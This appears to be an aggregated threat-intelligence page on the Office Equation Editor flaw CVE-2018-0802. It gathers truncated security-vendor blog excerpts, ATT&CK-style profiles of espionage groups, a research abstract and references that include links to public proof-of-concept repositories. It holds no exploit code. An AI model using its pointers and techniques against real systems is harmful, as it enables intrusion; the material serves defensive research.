IT threat evolution Q3 2020. Non-mobile statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Evgeny Lopatin
- Alexey Kulaev
- Alexander Kolesnikov
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3:
- Kaspersky solutions blocked 1,416,295,227 attacks launched from online resources across the globe.
- 456,573,467 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempts to run malware for stealing
Securelist
MosaicRegressor: Lurking in the Shadows of UEFI
blogs_securelist·2020-10-05
MosaicRegressor: Lurking in the Shadows of UEFI
Table of Contents
Current State of the Art
Our Discovery
The Bigger Picture: Enter MosaicRegressor Framework
Who were the Targets?
Who is behind the attack?
Conclusion
IoCs
Authors
Mark Lechtik
Igor Kuznetsov
Yury Parshin
Part II. Technical details (PDF)
UEFI (or Unified Extensible Firmware Interface) has become a prominent technology that is embedded within designated chips on modern day computer systems. Replacing the legacy BIOS, it is typically used to facilitate the machine’s boot sequence and load the operating system, while using a feature-rich environment to do so. At the same time, it has become the target of threat actors to carry out exceptionally persistent attacks.
One such attack has become the subject of our research, where we found a compromised UEFI firmware
Securelist
IT threat evolution Q2 2020. PC statistics
blogs_securelist·2020-09-03
IT threat evolution Q2 2020. PC statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on Apple macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Evgeny Lopatin
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Alexey Kulaev
- Alexander Kolesnikov
IT threat evolution Q2 2020. Review
IT threat evolution Q2 2020. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2:
- Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.
- As many as 286,
Securelist
Cycldek: Bridging the (air) gap
blogs_securelist·2020-06-03
Cycldek: Bridging the (air) gap
Table of Contents
Key findings
Background
Two implants, two clusters
Info stealing and lateral movement toolset
Formerly Unreported Malware: USBCulprit
Conclusion
Appendix – IOCs
Authors
GReAT
Mark Lechtik
Giampaolo Dedola
## Key findings
While investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:
- Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast
Tenable
How VPR Helped Prioritize the Most Dangerous CVEs in 2019
blogs_tenable·2020-04-30
How VPR Helped Prioritize the Most Dangerous CVEs in 2019
Qualys
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advanced Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
| No. | CVE | Products Affected by CVE | CVSS Score (NVD) | Examples of Threat Actors |
|---|---|---|---|---|
| 1 | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) |
| 2 | | | | |
Securelist
IT threat evolution Q3 2019
blogs_securelist·2019-11-29
IT threat evolution Q3 2019
Table of Contents
- Targeted attacks and malware campaigns
- Other security news
Authors
- David Emm
## Targeted attacks and malware campaigns
### Mobile espionage targeting the Middle East
At the end of June we reported the details of a highly targeted campaign that we dubbed ‘Operation ViceLeaker’ involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our Threat Intelligence Portal. We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. The attack
Securelist
IT threat evolution Q2 2019. Statistics
blogs_securelist·2019-08-19
IT threat evolution Q2 2019. Statistics
Table of Contents
- Quarterly figures
- Mobile threats
- Attacks on Apple macOS
- IoT attacks
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyber attacks
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Boris Larin
- Oleg Kupreev
- Evgeny Lopatin
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network,
- Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.
- 217,843,293 unique URLs triggered Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were
Securelist
Recent Cloud Atlas activity
blogs_securelist·2019-08-12·CVSS 7.8
[HIGH] Recent Cloud Atlas activity
Authors
GReAT
Also known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported Cloud Atlas in 2014 and we’ve been following its activities ever since.
From the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.
Countries targeted by Cloud Atlas recently
Cloud Atlas hasn’t changed its TTPs (Tactics, Techniques and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.
The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing ema
Securelist
IT threat evolution Q1 2019. Statistics
blogs_securelist·2019-05-23
IT threat evolution Q1 2019. Statistics
Table of Contents
- Quarterly figures
- Mobile threats
- Attacks on Apple macOS
- IoT attacks
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Boris Larin
- Oleg Kupreev
- Evgeny Lopatin
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network,
- Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
- 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed t
Securelist
Spam and phishing in Q1 2019
blogs_securelist·2019-05-15
Spam and phishing in Q1 2019
Table of Contents
- Quarterly highlights
- Statistics: spam
- Statistics: phishing
- Conclusion
Authors
- Maria Vergelis
- Tatyana Shcherbakova
- Tatyana Sidorina
## Quarterly highlights
### Valentine’s Day
As per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.
But most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim’s payment details being sent to the cybercriminals.
### New Apple products
Late March saw the unveiling of Apple’s latest products, which fraudsters wer
Zscaler
The Top 10 ThreatLabZ blogs from 2018 | Zscaler
blogs_zscaler·2018-12-31
The Top 10 ThreatLabZ blogs from 2018 | Zscaler
Securelist
IT threat evolution Q3 2018. Statistics
blogs_securelist·2018-11-12
IT threat evolution Q3 2018. Statistics
Table of Contents
- Q3 figures
- Mobile threats
- Attacks on IoT devices
- Financial threats
- Cryptoware programs
- Cryptominers
- Vulnerable apps used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Evgeny Lopatin
- Alexander Liskin
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.
## Q3 figures
According to Kaspersky Security Network:
- Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.
- 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to
Unit42
Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
blogs_unit42·2018-07-24
Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
Liat Hayun
Published: July 24, 2018
Nearly all of us have a use for Microsoft Office documents. Whether they are work documents, e-receipts, or a lease on a new apartment – Office documents are useful to all of us, and this is part of the reason we’re very likely to open an office document we receive as an attachment in e-mail. Armed with the knowledge that many people will open nearly any document, even those from an untrusted source, adversaries commonly choose these files in attacks to compromise a system.
In this threat brief we show you five different ways that Office documents can be subverted and abused to attack and compromise a Windows endpoint, some we’ve already posted about before, and some are new.
## Macros
Macros are the most straight-forward way for an attacker to weaponize Office documents. Office applicatio
Securelist
IT threat evolution Q1 2018. Statistics
blogs_securelist·2018-05-14
IT threat evolution Q1 2018. Statistics
Table of Contents
- Q1 figures
- Mobile threats
- Vulnerable apps used by cybercriminals
- Malicious programs online (attacks via web resources)
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
- Oleg Kupreev
## Q1 figures
According to KSN:
- Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.
- 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.
- Ransomware attacks were registered on the computers of 179,934 unique users.
- Our File Anti-Virus logged 187,597,494 unique malicious and potentially
Zscaler
Malspam Campaigns Use Malicious RTF Documents | Zscaler Blog
blogs_zscaler·2018-04-26·CVSS 7.8
[HIGH] Malspam Campaigns Use Malicious RTF Documents | Zscaler Blog
Trendmicro
Tropic Trooper’s New Strategy
blogs_trendmicro·2018-03-14·CVSS 7.8
[HIGH] Tropic Trooper’s New Strategy
# Tropic Trooper’s New Strategy
Tropic Trooper (also known as KeyBoy) levels its campaigns against Taiwanese, Philippine, and Hong Kong targets. Many of the tools they use now feature new behaviors, including a change in the way they maintain a foothold in the targeted network.
By: Jaromir Horejsi, Joey Chen, Joseph C Chen
2018/03/14
Tropic Trooper (also known as KeyBoy) levels its campaigns against Taiwanese, Philippine, and Hong Kong targets, focusing on their government, healthcare, transportation, and high-tech industries. Its operators are believed to be very organized and develop their own cyberespionage tools that they fine-tuned in their recent campaigns. Many of the tools they use now feature new behaviors, including a
Unit42
Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
blogs_unit42·2018-01-19·CVSS 7.8
CVE-2018-0802 [HIGH] Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
## Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
Gal De Leon
Maor Dokhanian
Published: January 19, 2018
Last November, Microsoft manually patched a remotely exploitable vulnerability (CVE-2017-11882) in Equation Editor, which is a program that lets you write a mathematical equation into a document. Our Unit 42 research team provided a detailed analysis on this vulnerability here.
Since then, Microsoft has received additional reports from multiple security vendors that turned out to be related to another vulnerability that was successfully exploited after applying Microsoft’s update – Microsoft assigned it as CVE-2018-0802 and released a fix for it in the January 2018 monthly security updates.
The vulnerability is a stack overflow bug when parsing the long font name string in a FONT record, just like CVE-2017-11882. It can be used by attackers to execute code in the security context of the
Krebs
Microsoft’s Jan. 2018 Patch Tuesday Lowdown
blogs_krebs·2018-01-10
Microsoft’s Jan. 2018 Patch Tuesday Lowdown
Microsoft on Tuesday released 14 security updates, including fixes for the Spectre and Meltdown flaws detailed last week, as well as a zero-day vulnerability in Microsoft Office that is being exploited in the wild. Separately, Adobe pushed a security update to its Flash Player software.
Last week’s story, Scary Chip Flaws Raise Spectre of Meltdown, sought to explain the gravity of these two security flaws present in most modern computers, smartphones, tablets and mobile devices. The bugs are thought to be mainly exploitable in chips made by Intel and ARM, but researchers said it was possible they also could be leveraged to steal data from computers with chips made by AMD.
By the time that story had published, Microsoft had already begun shipping an emergency update to address the flaws, but many readers complained that their PCs experienced the dreaded “blue screen of death” (BSOD) after applying the update. Microsoft warned that the BSOD problems were attributable to many antivirus programs not yet updating their software to play nice with the security updates.
On Tuesday, Microsoft said it was suspending the patches for computers running AMD chipsets.
“After investigati
Talos
Microsoft Patch Tuesday - January 2018
blogs_talos·2018-01-09·CVSS 7.5
[HIGH] Microsoft Patch Tuesday - January 2018
## Microsoft Patch Tuesday - January 2018
Today Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 56 new vulnerabilities with 16 of them rated critical, 39 of them rated important and 1 of them rated Moderate. These vulnerabilities impact ASP.NET, Edge, Internet Explorer, Office, Windows, and more.
In addition to the 56 vulnerabilities addressed, Microsoft has also released an update that addresses Meltdown and Spectre. Mitigations for these two vulnerabilities were published for Windows in ADV180002. Note that due to incompatibilities with anti-virus products, users and organizations may not have received this update yet. For more information, users should refer to Microsoft's knowledge base articl
Checkpoint
Exploiting CVE-2018-0802 Office Equation Vulnerabilty Demo Video
blogs_checkpoint·2018-01-09·CVSS 7.8
CVE-2018-0802 [HIGH] Exploiting CVE-2018-0802 Office Equation Vulnerabilty Demo Video
## Exploiting CVE-2018-0802 Office Equation Vulnerability Demo Video
The Check Point Research team discovered a new vulnerability (CVE-2018-0802) in the Office Equation 3.0 process (EQNEDT32.E
Checkpoint
Many Formulas, One Calc – Exploiting a New Office Equation Vulnerability
blogs_checkpoint·2018-01-09·CVSS 7.8
CVE-2017-11882 [HIGH] Many Formulas, One Calc – Exploiting a New Office Equation Vulnerability
## Many Formulas, One Calc – Exploiting a New Office Equation Vulnerability
Research By: Omer Gull and Netanel Ben Simon
Background
A few weeks ago, a vulnerability in the Office Equation 3
Recorded Future
RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
blogs_recorded_future
RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
# RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
Click here to download the complete analysis as a PDF.
Scope Note: Recorded Future analyzed new malware targeting the Tibetan community. This report includes a detailed analysis of the malware itself and associated infrastructure. Sources include Recorded Future’s platform, VirusTotal, ReversingLabs, and third-party metadata, as well as common OSINT and network metadata enrichments, such as DomainTools Iris and PassiveTotal, and researcher collaboration.1 The impetus of this research is twofold: to provide indicators to leverage for protection for likely victims and to raise awareness of a possible shift in adversary TTPs.
### Executive Summary
Recorded Future’s Insikt Group has identified two new cyberespionage campa
Threat Intel
Confucius (Confucius, Confucius APT)
threat_intel·CVSS 7.8
[HIGH] Confucius (Confucius, Confucius APT)
# Threat Actor Profile: Confucius
ATT&CK ID: G0142
Also known as: Confucius, Confucius APT
## Overview
Confucius is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between Confucius and Patchwork, particularly in their respective custom malware code and targets.(Citation: TrendMicro Confucius APT Feb 2018)(Citation: TrendMicro Confucius APT Aug 2021)(Citation: Uptycs Confucius APT Jan 2021)
## Techniques (TTPs)
### Resource Development
- T1583.006 Web Services
Usage: Confucius has obtained cloud storage service accounts to host stolen data.(Citation: TrendMicro Confucius APT Feb 2018)
### Initial Access
- T156
Recorded Future
Chinese State-Sponsored Group TA413 Adopts New Capabilities in Pursuit of Tibetan Targets
blogs_recorded_future·CVSS 9.8
[CRITICAL] Chinese State-Sponsored Group TA413 Adopts New Capabilities in Pursuit of Tibetan Targets
# Chinese State-Sponsored Group TA413 Adopts New Capabilities in Pursuit of Tibetan Targets
Editor’s Note: The following post is an excerpt of a full report. To read the entire analysis, click here to download the report as a PDF.
This report details multiple campaigns conducted by the likely Chinese state-sponsored threat activity group TA413. The activity was identified through a combination of large-scale automated network traffic analytics and expert analysis. This report will be of most interest to individuals and organizations with strategic and operational intelligence requirements relating to Chinese cyber threat activity, as well as humanitarian and other organizations concerned with Tibetan interests. With thanks to our colleagues at Sophos for early sharing and collaboration.
Threat Intel
BITTER (BITTER, T-APT-17)
threat_intel·CVSS 8.8
[HIGH] BITTER (BITTER, T-APT-17)
# Threat Actor Profile: BITTER
ATT&CK ID: G1002
Also known as: BITTER, T-APT-17
Suspected origin: China
## Overview
BITTER is a suspected South Asian cyber espionage threat group that has been active since at least 2013. BITTER has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)
## Techniques (TTPs)
### Resource Development
- T1588.002 Tool
Usage: BITTER has obtained tools such as PuTTY for use in their operations.(Citation: Forcepoint BITTER Pakistan Oct 2016)
- T1608.001 Upload Malware
Usage: BITTER has registered domains to stage payloads.(Citation: Forcepoint BITTER Pakistan Oct 2016)
- T1583.001 Domains
Usage: BITTER has regis
Threat Intel
BRONZE BUTLER (BRONZE BUTLER, REDBALDKNIGHT, Tick)
threat_intel·CVSS 7.8
[HIGH] BRONZE BUTLER (BRONZE BUTLER, REDBALDKNIGHT, Tick)
# Threat Actor Profile: BRONZE BUTLER
ATT&CK ID: G0060
Also known as: BRONZE BUTLER, REDBALDKNIGHT, Tick
Suspected origin: China
## Overview
BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)
## Techniques (TTPs)
### Resource Development
- T1588.002 Tool
Usage: BRONZE BUTLER has obtained and used open-source tools such as Mimikatz, gsecdump, and Windows Credential Editor.(Citation: Symantec Tick Apr 2016)
### Initial Access
- T1566.001 Spearphishing A
Crowdstrike
Two Birds, One STONE PANDA
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] Two Birds, One STONE PANDA
Threat Intel
Tropic Trooper (Tropic Trooper, Pirate Panda, KeyBoy)
threat_intel
Tropic Trooper (Tropic Trooper, Pirate Panda, KeyBoy)
# Threat Actor Profile: Tropic Trooper
ATT&CK ID: G0081
Also known as: Tropic Trooper, Pirate Panda, KeyBoy
Suspected origin: China
## Overview
Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. Tropic Trooper focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)
## Techniques (TTPs)
### Initial Access
- T1566.001 Spearphishing Attachment
Usage: Tropic Trooper sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.(Citation: Unit 42 Tropic Trooper Nov 2016)(
Fortinet
FortiGuard Labs Threat Research
blogs_fortinet·CVSS 7.8
[HIGH] FortiGuard Labs Threat Research
Threat Intel
Tonto Team (Tonto Team, Earth Akhlut, BRONZE HUNTLEY)
threat_intel·CVSS 7.8
[HIGH] Tonto Team (Tonto Team, Earth Akhlut, BRONZE HUNTLEY)
# Threat Actor Profile: Tonto Team
ATT&CK ID: G0131
Also known as: Tonto Team, Earth Akhlut, BRONZE HUNTLEY, CactusPete, Karma Panda
Suspected origin: China
## Overview
Tonto Team is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. Tonto Team has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).(Citation: Kaspersky CactusPete Aug 2020)(Citation: ESET Exchange Mar 2021)(Citation: FireEye Chinese Espionage October 2019)(Citation: ARS Te
Threat Intel
Inception (Inception, Inception Framework, Cloud Atlas)
threat_intel·CVSS 8.8
[HIGH] Inception (Inception, Inception Framework, Cloud Atlas)
# Threat Actor Profile: Inception
ATT&CK ID: G0100
Also known as: Inception, Inception Framework, Cloud Atlas
Suspected origin: Russia
## Overview
Inception is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.(Citation: Unit 42 Inception November 2018)(Citation: Symantec Inception Framework March 2018)(Citation: Kaspersky Cloud Atlas December 2014)
## Techniques (TTPs)
### Resource Development
- T1588.002 Tool
Usage: Inception has obtained and used open-source tools such as LaZagne.(Citation: Kaspersky Cloud Atlas August 2019)
### Initial Access
- T1566.001 Spearphishing Attachment
Usage: Ince
arXiv
A Cascade Approach for APT Campaign Attribution in System Event Logs: Technique Hunting and Subgraph Matching
arxiv_fulltext·2024-10-29
A Cascade Approach for APT Campaign Attribution in System Event Logs: Technique Hunting and Subgraph Matching
A Cascade Approach for APT Campaign Attribution in System Event Logs: Technique Hunting and Subgraph Matching
Yi-Ting Huang, Ying-Ren Guo, Guo-Wei Wong, and Meng Chang Chen
## Abstract
As Advanced Persistent Threats (APTs) grow increasingly sophisticated, the demand for effective detection methods has intensified. This study addresses the challenge of identifying APT campaign attacks through system event logs. A cascading approach, named SFM, combines Technique hunting and APT campaign attribution. Our approach assumes that real-world system event logs contain a vast majority of normal events interspersed with few suspiciously malicious ones and that these logs are annotated with Techniques of the MITRE ATT&CK framework for attack pattern recognition. Then, we attribute APT campaign attacks
References:
- http://www.securityfocus.com/bid/102347
- http://www.securitytracker.com/id/1040153
- https://0patch.blogspot.com/2018/01/the-bug-that-killed-equation-editor-how.html
- https://github.com/rxwx/CVE-2018-0802
- https://github.com/zldww2011/CVE-2018-0802_POC
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802
- https://research.checkpoint.com/another-office-equation-rce-vulnerability/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-0802
Published: 2018-01-10
Added to CISA KEV: 2021-11-03
Exploited in the wild